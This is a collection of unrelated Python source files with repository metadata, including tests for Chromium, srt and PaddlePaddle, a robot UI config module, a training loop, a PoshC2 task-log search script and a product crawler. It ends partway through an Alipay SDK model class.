"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 574
|
py
|
cached-with-validation.py
|
ETAG = b'"123abc"'
CONTENT_TYPE = b"text/plain"
CONTENT = u"lorem ipsum dolor sit amet"
def main(request, response):
# let caching kick in if possible (conditional GET)
etag = request.headers.get(b"If-None-Match", None)
if etag == ETAG:
response.headers.set(b"X-HTTP-STATUS", 304)
response.status = (304, b"Not Modified")
return u""
# cache miss, so respond with the actual content
response.status = (200, b"OK")
response.headers.set(b"ETag", ETAG)
response.headers.set(b"Content-Type", CONTENT_TYPE)
return CONTENT
|
69fb81dc7b40743f79731cb2242d81437765671d
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/prb_control/entities/stronghold/unit/actions_validator.py
|
8f43fff0863f8fc957f666b9d9d89563ec8b0a05
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,395
|
py
|
actions_validator.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/prb_control/entities/stronghold/unit/actions_validator.py
from gui.prb_control.entities.base.squad.actions_validator import UnitActionsValidator
from gui.prb_control.entities.base.unit.actions_validator import UnitVehiclesValidator, CommanderValidator, UnitStateValidator
from gui.prb_control.items import ValidationResult
from gui.prb_control.settings import UNIT_RESTRICTION
class StrongholdVehiclesValidator(UnitVehiclesValidator):
pass
class StrongholdUnitSlotsValidator(CommanderValidator):
def _validate(self):
rosterSettings = self._entity.getRosterSettings()
stats = self._entity.getStats()
isPlayersMatchingAvailable = self._entity.isPlayersMatchingAvailable()
allMembersReady = stats.readyCount == stats.occupiedSlotsCount
if isPlayersMatchingAvailable:
isClanMembersEnough = stats.clanMembersInRoster >= rosterSettings.getMinClanMembersCount()
if not isClanMembersEnough:
return ValidationResult(False, UNIT_RESTRICTION.UNIT_MIN_CLAN_MEMBERS)
if not allMembersReady:
return ValidationResult(False, UNIT_RESTRICTION.NOT_READY_IN_SLOTS)
if stats.occupiedSlotsCount < rosterSettings.getMaxSlots() + 1:
return ValidationResult(True, UNIT_RESTRICTION.UNIT_WILL_SEARCH_PLAYERS)
else:
if rosterSettings.getMinSlots() > stats.occupiedSlotsCount:
return ValidationResult(False, UNIT_RESTRICTION.MIN_SLOTS)
if not allMembersReady:
return ValidationResult(False, UNIT_RESTRICTION.NOT_READY_IN_SLOTS)
return super(StrongholdUnitSlotsValidator, self)._validate()
class StrongholdUnitStateValidator(UnitStateValidator):
def _validate(self):
return ValidationResult(False, UNIT_RESTRICTION.UNIT_IS_IN_PLAYERS_MATCHING) if self._entity.inPlayersMatchingMode() else super(StrongholdUnitStateValidator, self)._validate()
class StrongholdActionsValidator(UnitActionsValidator):
def _createVehiclesValidator(self, entity):
return StrongholdVehiclesValidator(entity)
def _createSlotsValidator(self, entity):
return StrongholdUnitSlotsValidator(entity)
def _createStateValidator(self, entity):
return StrongholdUnitStateValidator(entity)
|
a430593f6bc94ad928577a9f5193d1233b95430d
|
c8c260b419b56ab6f1c86f52bc5df323af0d9009
|
/srt_tools/tests/test_srt_tools.py
|
b11aa54fd7f648e4a2fd5c405a6ae2b928b2206f
|
[
"MIT"
] |
permissive
|
cdown/srt
|
a86e900f4cf2bae9322231b54a2bb576e8b030bc
|
434d0c1c9d5c26d5c3fb1ce979fc05b478e9253c
|
refs/heads/develop
| 2023-07-11T09:20:53.086151
| 2023-03-28T02:33:47
| 2023-03-28T02:33:47
| 28,550,291
| 394
| 47
|
MIT
| 2023-09-09T21:16:32
| 2014-12-28T01:05:38
|
Python
|
UTF-8
|
Python
| false
| false
| 3,482
|
py
|
test_srt_tools.py
|
#!/usr/bin/env python
import os
import subprocess
import sys
import tempfile
try:
from shlex import quote
except ImportError: # <3.3 fallback
from pipes import quote
sample_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "files")
if os.name == "nt":
# Sigh, shlex.quote quotes incorrectly on Windows
quote = lambda x: windows_crappy_quote(x)
def run_srt_util(cmd, shell=False, encoding="utf-8-sig"):
extra_env = {}
env = {"PYTHONPATH": ".", "SystemRoot": r"C:\Windows"}
env.update(extra_env)
raw_out = subprocess.check_output(cmd, shell=shell, env=env)
return raw_out.decode(encoding)
def windows_crappy_quote(data):
"""
I'm 100% sure this isn't secure, please don't use it with untrusted code. I
beg you.
"""
data = data.replace('"', '""')
return '"' + data + '"'
def assert_supports_all_io_methods(cmd, exclude_output=False, exclude_stdin=False):
# TODO: pytype doesn't like the mixed types in the matrix, but this works
# fine. Maybe it would be happier with a namedtuple?
cmd[0] = "srt_tools/" + cmd[0] # pytype: disable=unsupported-operands
cmd.insert(0, sys.executable) # pytype: disable=attribute-error
in_file = os.path.join(sample_dir, "ascii.srt")
in_file_gb = os.path.join(sample_dir, "gb2312.srt")
fd, out_file = tempfile.mkstemp()
# This is accessed by filename, not fd
os.close(fd)
outputs = []
cmd_string = " ".join(quote(x) for x in cmd)
try:
outputs.append(run_srt_util(cmd + ["-i", in_file]))
if not exclude_stdin:
outputs.append(
run_srt_util("%s < %s" % (cmd_string, quote(in_file)), shell=True)
)
if not exclude_output:
run_srt_util(cmd + ["-i", in_file, "-o", out_file])
run_srt_util(
cmd + ["-i", in_file_gb, "-o", out_file, "-e", "gb2312"],
encoding="gb2312",
)
if not exclude_stdin:
run_srt_util(
"%s < %s > %s" % (cmd_string, quote(in_file), quote(out_file)),
shell=True,
)
run_srt_util(
"%s < %s > %s"
% (cmd_string + " -e gb2312", quote(in_file), quote(out_file)),
shell=True,
encoding="gb2312",
)
assert len(set(outputs)) == 1, repr(outputs)
if os.name == "nt":
assert "\r\n" in outputs[0]
else:
assert "\r\n" not in outputs[0]
finally:
os.remove(out_file)
def test_tools_support():
matrix = [
(["srt-normalise"], False),
(["srt-deduplicate"], False),
(["srt-fixed-timeshift", "--seconds", "5"], False),
(
[
"srt-linear-timeshift",
"--f1",
"00:00:01,000",
"--f2",
"00:00:02,000",
"--t1",
"00:00:03,000",
"--t2",
"00:00:04,000",
],
False,
),
(["srt-lines-matching", "-f", "lambda x: True"], False),
(["srt-process", "-f", "lambda x: x"], False),
(["srt-mux"], False, True),
(["srt-mux", "-t"], False, True),
# Need to sort out time/thread issues
# (('srt-play'), True),
]
for args in matrix:
assert_supports_all_io_methods(*args)
|
4d1b6212a887f6ed83903945a1fb47bc131aa9c9
|
974d04d2ea27b1bba1c01015a98112d2afb78fe5
|
/test/legacy_test/test_generator_dataloader.py
|
9d895538521900a115eb35913157cc69cafc96c7
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle
|
b3d2583119082c8e4b74331dacc4d39ed4d7cff0
|
22a11a60e0e3d10a3cf610077a3d9942a6f964cb
|
refs/heads/develop
| 2023-08-17T21:27:30.568889
| 2023-08-17T12:38:22
| 2023-08-17T12:38:22
| 65,711,522
| 20,414
| 5,891
|
Apache-2.0
| 2023-09-14T19:20:51
| 2016-08-15T06:59:08
|
C++
|
UTF-8
|
Python
| false
| false
| 7,202
|
py
|
test_generator_dataloader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import numpy as np
import paddle
from paddle import fluid
from paddle.fluid.reader import DataLoaderBase
EPOCH_NUM = 20
BATCH_SIZE = 32
BATCH_NUM = 20
CLASS_NUM = 10
def random_reader():
np.random.seed(1)
for i in range(BATCH_SIZE * BATCH_NUM):
image = np.random.random([784])
label = np.random.random_integers(low=0, high=CLASS_NUM - 1)
yield image, label
def simple_fc_net(places, use_legacy_py_reader, use_double_buffer):
paddle.seed(1)
paddle.framework.random._manual_program_seed(1)
startup_prog = fluid.Program()
main_prog = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(main_prog, startup_prog):
image = paddle.static.data(
name='image', shape=[-1, 784], dtype='float32'
)
label = paddle.static.data(
name='label', shape=[-1, 1], dtype='int64'
)
py_reader = fluid.io.DataLoader.from_generator(
feed_list=[image, label],
capacity=4,
iterable=not use_legacy_py_reader,
use_double_buffer=use_double_buffer,
)
hidden = image
for hidden_size in [10, 20, 30]:
hidden = paddle.static.nn.fc(
hidden,
size=hidden_size,
activation='tanh',
bias_attr=fluid.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=1.0)
),
)
predict_label = paddle.static.nn.fc(
hidden, size=CLASS_NUM, activation='softmax'
)
loss = paddle.mean(
paddle.nn.functional.cross_entropy(
input=predict_label,
label=label,
reduction='none',
use_softmax=False,
)
)
optimizer = paddle.optimizer.Adam()
optimizer.minimize(loss)
return startup_prog, main_prog, py_reader, loss
class TestBase(unittest.TestCase):
def run_main(
self,
use_legacy_py_reader,
places,
use_double_buffer,
):
scope = fluid.Scope()
with fluid.scope_guard(scope):
startup_prog, main_prog, py_reader, loss = simple_fc_net(
places, use_legacy_py_reader, use_double_buffer
)
reader = paddle.batch(random_reader, batch_size=BATCH_SIZE)
ps = places if use_double_buffer else fluid.cpu_places(len(places))
py_reader.set_sample_list_generator(
reader, places=ps if py_reader.iterable else None
)
exe = fluid.Executor(place=places[0])
exe.run(startup_prog)
prog = fluid.CompiledProgram(main_prog)
step = 0
step_list = []
loss_list = []
start_t = time.time()
if not py_reader.iterable:
for _ in range(EPOCH_NUM):
step = 0
py_reader.start()
while True:
try:
(L,) = exe.run(
program=prog,
fetch_list=[loss],
use_program_cache=True,
)
loss_list.append(np.mean(L))
step += 1
except fluid.core.EOFException:
py_reader.reset()
break
step_list.append(step)
else:
for _ in range(EPOCH_NUM):
step = 0
for d in py_reader():
assert len(d) == len(places), "{} != {}".format(
len(d), len(places)
)
for i, item in enumerate(d):
image = item['image']
label = item['label']
assert image.shape() == [BATCH_SIZE, 784]
assert label.shape() == [BATCH_SIZE, 1]
assert image._place()._equals(ps[i])
assert label._place()._equals(ps[i])
(L,) = exe.run(
program=prog,
feed=d,
fetch_list=[loss],
use_program_cache=True,
)
loss_list.append(np.mean(L))
step += 1
step_list.append(step)
end_t = time.time()
ret = {
"time": end_t - start_t,
"step": step_list,
"loss": np.array(loss_list),
}
return ret
def prepare_places(self, with_cpu=True, with_gpu=True):
places = []
if with_cpu:
places.append([fluid.CPUPlace()])
if with_gpu and fluid.core.is_compiled_with_cuda():
tmp = fluid.cuda_places()
assert len(tmp) > 0, "no gpu detected"
places.append([tmp[0]])
return places
def test_main(self):
for p in self.prepare_places():
for use_double_buffer in [False, True]:
results = []
for use_legacy_py_reader in [False, True]:
print(p, use_double_buffer, use_legacy_py_reader)
ret = self.run_main(
use_legacy_py_reader=use_legacy_py_reader,
places=p,
use_double_buffer=use_double_buffer,
)
results.append(ret)
if not use_double_buffer:
diff = np.max(
np.abs(results[0]['loss'] - results[1]['loss'])
)
self.assertLess(diff, 1e-3)
class TestDataLoaderBaseAbstract(unittest.TestCase):
def test_main(self):
loader = DataLoaderBase()
try:
loader.__iter__()
self.assertTrue(False)
except NotImplementedError:
self.assertTrue(True)
try:
loader.__next__()
self.assertTrue(False)
except NotImplementedError:
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
|
0e564e574247bd5075838570416fcd1422d0f139
|
5999474eb6a5d12efe7ca7bafc7e6e4048c65fc0
|
/pyUI/commonVar.py
|
74f21179ba8dde2113e7c8568513b5b8ed3d431f
|
[
"MIT"
] |
permissive
|
PetoiCamp/OpenCat
|
dd1c4bf857f7831f902aef812763581aeedb5d8e
|
335e0fe529f1acb405f879c5b6012398c835d953
|
refs/heads/main
| 2023-09-05T10:27:06.631580
| 2023-09-03T17:21:02
| 2023-09-03T17:21:02
| 326,441,188
| 2,374
| 315
|
MIT
| 2023-09-14T12:26:31
| 2021-01-03T15:42:00
|
C++
|
UTF-8
|
Python
| false
| false
| 2,885
|
py
|
commonVar.py
|
from translate import *
import sys
sys.path.append('../serialMaster/')
resourcePath = './resources/'
releasePath = './release/'
sys.path.append(resourcePath)
from ardSerial import *
from tkinter import *
from tkinter import messagebox
from PIL import ImageTk, Image
import tkinter.font as tkFont
import threading
import random
import datetime
import platform
import os
NyBoard_version = 'NyBoard_V1_2'
verNumber = sys.version.split('(')[0].split()[0]
verNumber = verNumber.split('.')
print(verNumber)
#verNumber = [2,1,1] #for testing
supportHoverTip = True
if int(verNumber[0])<3 or int(verNumber[1])<7:
print("Please upgrade your Python to 3.7.1 or above!")
root = Tk()
root.overrideredirect(1)
root.withdraw()
messagebox.showwarning(title='Warning', message='Please upgrade your Python\nto 3.7.1 or above\nto show hovertips!')
root.destroy()
supportHoverTip = False
# exit(0)
try:
from idlelib.tooltip import Hovertip
except Exception as e:
logger.info("Cannot import hovertip!")
raise e
NaJoints = {
'Nybble': [3, 4, 5, 6, 7],
'Bittle': [1, 2, 3, 4, 5, 6, 7],
'DoF16' : []
}
scaleNames = [
'Head Pan', 'Head Tilt', 'Tail Pan', 'N/A',
'Shoulder', 'Shoulder', 'Shoulder', 'Shoulder',
'Arm', 'Arm', 'Arm', 'Arm',
'Knee', 'Knee', 'Knee', 'Knee']
sideNames = ['Left Front', 'Right Front', 'Right Back', 'Left Back']
ports = []
def mkdir(path):
# delete spaces in the path string
path = path.strip()
# delete the '\' at the end of path string
path = path.rstrip("\\").rstrip("/")
# path = path.rstrip("/")
# check whether the path exists
isExists = os.path.exists(path)
if not isExists:
# Create the directory if it does not exist
os.makedirs(path)
print(path + ' creat successfully')
return True
else:
# If the directory exists, it will not be created and prompt that the directory already exists.
print(path + ' already exists')
return False
if platform.system() == "Windows": # for Windows
seperation = '\\'
homeDri = os.getenv('HOMEDRIVE')
homePath = os.getenv('HomePath')
configDir = homeDri + '\\' + homePath
else: # for Linux & macOS
seperation = '/'
home = os.getenv('HOME')
configDir = home
configDir = configDir + seperation +'.config' + seperation +'Petoi'
mkdir(configDir)
defaultConfPath = configDir + seperation + 'defaultConfig.txt'
print(defaultConfPath)
def createImage(frame, imgFile, imgW):
img = Image.open(imgFile)
ratio = img.size[0] / imgW
img = img.resize((imgW, round(img.size[1] / ratio)))
image = ImageTk.PhotoImage(img)
imageFrame = Label(frame, image=image)
imageFrame.image = image
return imageFrame
def tip(item, note):
if supportHoverTip:
Hovertip(item,note)
# else:
# print(note)
|
304a2b89927d8172b4ba0f3f804a2ab3f914b862
|
58375cb29ebcd2da7adc182fd10c6f76d6deee6e
|
/FOTS/base/base_trainer.py
|
1f9a0e28b945407160adb8b8675aa03ac8c1a9d4
|
[
"BSD-3-Clause"
] |
permissive
|
jiangxiluning/FOTS.PyTorch
|
d0d5a53595308335f20803d7a1d73274a4dad5a7
|
7484a81417f35b4f5c48edd3eb3e855416797379
|
refs/heads/master
| 2023-02-19T23:45:06.317493
| 2023-02-14T15:30:18
| 2023-02-14T15:30:18
| 142,129,096
| 726
| 236
|
BSD-3-Clause
| 2022-10-06T17:19:51
| 2018-07-24T08:31:45
|
Python
|
UTF-8
|
Python
| false
| false
| 7,420
|
py
|
base_trainer.py
|
import os
import math
import json
import logging
import torch
import torch.optim as optim
from tensorboardX import SummaryWriter
from ..utils.util import ensure_dir
class BaseTrainer:
"""
Base class for all trainers
"""
def __init__(self, model, loss, metrics, resume, config, train_logger=None):
self.config = config
self.logger = logging.getLogger(self.__class__.__name__)
self.model = model
self.loss = loss
self.metrics = metrics
self.name = config['name']
self.epochs = config['trainer']['epochs']
self.save_freq = config['trainer']['save_freq']
self.verbosity = config['trainer']['verbosity']
self.summyWriter = SummaryWriter()
if torch.cuda.is_available():
if config['cuda']:
self.with_cuda = True
self.gpus = {i: item for i, item in enumerate(self.config['gpus'])}
device = 'cuda'
if torch.cuda.device_count() > 1 and len(self.gpus) > 1:
self.model.parallelize()
torch.cuda.empty_cache()
else:
self.with_cuda = False
device = 'cpu'
else:
self.logger.warning('Warning: There\'s no CUDA support on this machine, '
'training is performed on CPU.')
self.with_cuda = False
device = 'cpu'
self.device = torch.device(device)
self.model.to(self.device)
self.logger.debug('Model is initialized.')
self._log_memory_useage()
self.train_logger = train_logger
self.optimizer = self.model.optimize(config['optimizer_type'], config['optimizer'])
self.lr_scheduler = getattr(
optim.lr_scheduler,
config['lr_scheduler_type'], None)
if self.lr_scheduler:
self.lr_scheduler = self.lr_scheduler(self.optimizer, **config['lr_scheduler'])
self.lr_scheduler_freq = config['lr_scheduler_freq']
self.monitor = config['trainer']['monitor']
self.monitor_mode = config['trainer']['monitor_mode']
assert self.monitor_mode == 'min' or self.monitor_mode == 'max'
self.monitor_best = math.inf if self.monitor_mode == 'min' else -math.inf
self.start_epoch = 1
self.checkpoint_dir = os.path.join(config['trainer']['save_dir'], self.name)
ensure_dir(self.checkpoint_dir)
json.dump(config, open(os.path.join(self.checkpoint_dir, 'pretrain.json'), 'w'),
indent=4, sort_keys=False)
if resume:
self._resume_checkpoint(resume)
def train(self):
"""
Full training logic
"""
print(self.epochs)
for epoch in range(self.start_epoch, self.epochs + 1):
try:
result = self._train_epoch(epoch)
except torch.cuda.CudaError:
self._log_memory_useage()
log = {'epoch': epoch}
for key, value in result.items():
if key == 'metrics':
for i, metric in enumerate(self.metrics):
log[metric.__name__] = result['metrics'][i]
elif key == 'val_metrics':
for i, metric in enumerate(self.metrics):
log['val_' + metric.__name__] = result['val_metrics'][i]
else:
log[key] = value
if self.train_logger is not None:
self.train_logger.add_entry(log)
if self.verbosity >= 1:
for key, value in log.items():
self.logger.info(' {:15s}: {}'.format(str(key), value))
if (self.monitor_mode == 'min' and log[self.monitor] < self.monitor_best)\
or (self.monitor_mode == 'max' and log[self.monitor] > self.monitor_best):
self.monitor_best = log[self.monitor]
self._save_checkpoint(epoch, log, save_best=True)
if epoch % self.save_freq == 0:
self._save_checkpoint(epoch, log)
if self.lr_scheduler:
self.lr_scheduler.step()
lr = self.lr_scheduler.get_lr()[0]
self.logger.info('New Learning Rate: {:.8f}'.format(lr))
self.summyWriter.add_scalars('Train', {'train_' + self.monitor: result[self.monitor],
'val_' + self.monitor: result[self.monitor]}, epoch)
self.summyWriter.close()
def _log_memory_useage(self):
if not self.with_cuda: return
template = """Memory Usage: \n{}"""
usage = []
for deviceID, device in self.gpus.items():
deviceID = int(deviceID)
allocated = torch.cuda.memory_allocated(deviceID) / (1024 * 1024)
cached = torch.cuda.memory_cached(deviceID) / (1024 * 1024)
usage.append(' CUDA: {} Allocated: {} MB Cached: {} MB \n'.format(device, allocated, cached))
content = ''.join(usage)
content = template.format(content)
self.logger.debug(content)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Current epoch number
"""
raise NotImplementedError
def _save_checkpoint(self, epoch, log, save_best=False):
"""
Saving checkpoints
:param epoch: current epoch number
:param log: logging information of the epoch
:param save_best: if True, rename the saved checkpoint to 'model_best.pth.tar'
"""
arch = type(self.model).__name__
state = {
'arch': arch,
'epoch': epoch,
'logger': self.train_logger,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'monitor_best': self.monitor_best,
'config': self.config
}
filename = os.path.join(self.checkpoint_dir, 'checkpoint-epoch{:03d}-loss-{:.4f}.pth.tar'
.format(epoch, log['loss']))
torch.save(state, filename)
if save_best:
os.rename(filename, os.path.join(self.checkpoint_dir, 'model_best.pth.tar'))
self.logger.info("Saving current best: {} ...".format('model_best.pth.tar'))
else:
self.logger.info("Saving checkpoint: {} ...".format(filename))
def _resume_checkpoint(self, resume_path):
"""
Resume from saved checkpoints
:param resume_path: Checkpoint path to be resumed
"""
self.logger.info("Loading checkpoint: {} ...".format(resume_path))
checkpoint = torch.load(resume_path)
self.start_epoch = checkpoint['epoch'] + 1
self.monitor_best = checkpoint['monitor_best']
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
if self.with_cuda:
for state in self.optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.cuda(torch.device('cuda'))
self.train_logger = checkpoint['logger']
#self.config = checkpoint['config']
self.logger.info("Checkpoint '{}' (epoch {}) loaded".format(resume_path, self.start_epoch))
|
bc97cd90d9b893ef27632fe4868a94106c81643c
|
3e00405025535eb1a1829b70f9e984ea9bb76fc5
|
/resources/scripts/fpc.py
|
c10f407ce3c24c1a0072fc1ff17fb875a007b9d9
|
[
"BSD-3-Clause"
] |
permissive
|
nettitude/PoshC2
|
5d1fdfbd53ee82e6fb145bde5cbb1afc6b2067ed
|
517903431ab43e6d714b24b0752ba111f5d4c2f1
|
refs/heads/master
| 2023-08-24T17:45:43.198409
| 2022-07-12T11:12:28
| 2022-08-01T09:09:15
| 141,987,967
| 1,378
| 299
|
BSD-3-Clause
| 2023-07-23T22:14:04
| 2018-07-23T08:53:32
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 2,692
|
py
|
fpc.py
|
#!/usr/bin/env python3
import sys, argparse, os, pandas
class Colours:
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
END = '\033[0m'
YELLOW = '\033[93m'
def create_arg_parser():
parser = argparse.ArgumentParser(description='Find Posh Command - Search for a PoshC2 Command Output')
parser.add_argument("-p", "--project", help='The PoshC2 project dir', default = '/opt/PoshC2_Project')
parser.add_argument("-d", "--database_type", help="The database type (SQLite/Postgres)", default = 'SQLite')
parser.add_argument("-pg", "--postgres_string", help="The postgres connection string (if using postgres)", default = '')
parser.add_argument("-c", "--command", help='The command to search for', default = '%')
parser.add_argument("-u", "--user", help='The user to filter on', default = '%')
parser.add_argument("-o", "--output", help='The output to search for', default = '%')
parser.add_argument("-t", "--taskid", help='The taskid to search for', default = '%')
return parser
def get_db_connection(args):
conn = None
if args.database_type.lower() == "postgres":
import psycopg2
conn = psycopg2.connect(args.postgres_string)
else:
db_path = os.path.join(args.project, 'PowershellC2.SQLite')
if not os.path.exists(db_path):
print(f"[-] Database does not exist: {db_path}")
sys.exit(1)
import sqlite3
conn = sqlite3.connect(db_path)
conn.text_factory = str
conn.row_factory = sqlite3.Row
return conn
def main():
args = create_arg_parser().parse_args()
conn = get_db_connection(args)
if args.command == '%' and args.output == '%' and args.taskid == '%':
print("%s[-] A minimum of a --command, --taskid or --output search term must be specified%s" % (Colours.RED, Colours.END))
sys.exit(1)
with pandas.option_context('display.max_rows', None, 'display.max_columns', None, 'display.max_colwidth', -1):
output = pandas.read_sql_query("SELECT SentTime,CompletedTime,User,Command,Output,TaskId from Tasks where User like '%s' and Command like '%%%s%%' and Output like '%%%s%%' and CAST(TaskId as text) like '%%%s%%'" % (args.user, args.command, args.output, args.taskid), conn)
for entry in output.values:
print("\n%s[*][*][*] Task %05d Command (Issued: %s by %s):\n%s" % (Colours.GREEN, entry[5], entry[0], entry[2], Colours.END))
print(entry[3])
print("\n%s[*][*][*] Task %05d Output (Completed: %s):\n%s" % (Colours.BLUE, entry[5], entry[1], Colours.END))
print(entry[4])
print()
if __name__ == '__main__':
main()
|
fead24b06f6f19af876a83481fc138198640ef42
|
08690eb8fc250e29d749d6baa694a16c03d3ad71
|
/backend/data/crawler/lotte_crawler.py
|
8c1c7e0bd00746fc08b5cefa362822f64d8820e3
|
[
"MIT"
] |
permissive
|
NullFull/isnamyang
|
de1e0e16a45c120cefec4500afe6ab38d44ea2c0
|
20a21f233d8234365739ed8514dcac25c98e51e6
|
refs/heads/main
| 2023-07-19T23:41:29.073366
| 2023-05-08T06:06:54
| 2023-05-08T06:06:54
| 184,061,909
| 117
| 26
|
MIT
| 2023-09-06T15:16:45
| 2019-04-29T11:53:09
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,396
|
py
|
lotte_crawler.py
|
import pandas as pd
from selenium import webdriver
import csv
CHROME_DRIVER_PATH = '/Users/jiwoo/Documents/chromedriver'
FILE_PATH = 'products.csv'
def crawler(keyword):
url = 'http://www.lottemart.com/search/search.do?searchTerm='
url = url + keyword
driver = webdriver.Chrome(CHROME_DRIVER_PATH)
driver.get(url)
df = pd.read_csv(FILE_PATH)
with open(FILE_PATH, 'a') as f:
f.write('\n')
while(1):
try:
product_list = driver.find_elements_by_xpath('//*[@class="product-article"][@data-panel="product"]/div/a')
for product in product_list:
product_code = product.get_attribute("data-prod-cd")
product_name = product.find_element_by_xpath('.//img').get_attribute("alt")
print(product_name, product_code)
df['바코드'] = product_code
df['제품명'] = product_name
df.to_csv(FILE_PATH, mode='a', header=False, line_terminator='\n', index=False)
# 다음 페이지 클릭
next_btn = driver.find_element_by_xpath('//a[@class="page-next"]')
next_btn.send_keys("\n") # 버튼에 엔터 전송
except Exception:
break
driver.close()
except KeyboardInterrupt:
break
driver.close()
if __name__ == "__main__":
crawler("남양")
|
40996c04bef8c01a3a504b1e4f48036756f48aad
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayCommerceEducateCreditbankStudyprofileModifyModel.py
|
522193b9ec6ac995955febbf959127c0ab8f1d30
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,966
|
py
|
AlipayCommerceEducateCreditbankStudyprofileModifyModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.CreditBankCertificateExperience import CreditBankCertificateExperience
from alipay.aop.api.domain.CreditBankCredit import CreditBankCredit
from alipay.aop.api.domain.CreditBankTraining import CreditBankTraining
class AlipayCommerceEducateCreditbankStudyprofileModifyModel(object):
def __init__(self):
self._cb_id = None
self._certificate_experience = None
self._certificate_num = None
self._channel = None
self._credit = None
self._credit_num = None
self._training = None
self._training_num = None
self._user_id = None
@property
def cb_id(self):
return self._cb_id
@cb_id.setter
def cb_id(self, value):
self._cb_id = value
@property
def certificate_experience(self):
return self._certificate_experience
@certificate_experience.setter
def certificate_experience(self, value):
if isinstance(value, list):
self._certificate_experience = list()
for i in value:
if isinstance(i, CreditBankCertificateExperience):
self._certificate_experience.append(i)
else:
self._certificate_experience.append(CreditBankCertificateExperience.from_alipay_dict(i))
@property
def certificate_num(self):
return self._certificate_num
@certificate_num.setter
def certificate_num(self, value):
self._certificate_num = value
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
self._channel = value
@property
def credit(self):
return self._credit
@credit.setter
def credit(self, value):
if isinstance(value, list):
self._credit = list()
for i in value:
if isinstance(i, CreditBankCredit):
self._credit.append(i)
else:
self._credit.append(CreditBankCredit.from_alipay_dict(i))
@property
def credit_num(self):
return self._credit_num
@credit_num.setter
def credit_num(self, value):
self._credit_num = value
@property
def training(self):
return self._training
@training.setter
def training(self, value):
if isinstance(value, list):
self._training = list()
for i in value:
if isinstance(i, CreditBankTraining):
self._training.append(i)
else:
self._training.append(CreditBankTraining.from_alipay_dict(i))
@property
def training_num(self):
return self._training_num
@training_num.setter
def training_num(self, value):
self._training_num = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.cb_id:
if hasattr(self.cb_id, 'to_alipay_dict'):
params['cb_id'] = self.cb_id.to_alipay_dict()
else:
params['cb_id'] = self.cb_id
if self.certificate_experience:
if isinstance(self.certificate_experience, list):
for i in range(0, len(self.certificate_experience)):
element = self.certificate_experience[i]
if hasattr(element, 'to_alipay_dict'):
self.certificate_experience[i] = element.to_alipay_dict()
if hasattr(self.certificate_experience, 'to_alipay_dict'):
params['certificate_experience'] = self.certificate_experience.to_alipay_dict()
else:
params['certificate_experience'] = self.certificate_experience
if self.certificate_num:
if hasattr(self.certificate_num, 'to_alipay_dict'):
params['certificate_num'] = self.certificate_num.to_alipay_dict()
else:
params['certificate_num'] = self.certificate_num
if self.channel:
if hasattr(self.channel, 'to_alipay_dict'):
params['channel'] = self.channel.to_alipay_dict()
else:
params['channel'] = self.channel
if self.credit:
if isinstance(self.credit, list):
for i in range(0, len(self.credit)):
element = self.credit[i]
if hasattr(element, 'to_alipay_dict'):
self.credit[i] = element.to_alipay_dict()
if hasattr(self.credit, 'to_alipay_dict'):
params['credit'] = self.credit.to_alipay_dict()
else:
params['credit'] = self.credit
if self.credit_num:
if hasattr(self.credit_num, 'to_alipay_dict'):
params['credit_num'] = self.credit_num.to_alipay_dict()
else:
params['credit_num'] = self.credit_num
if self.training:
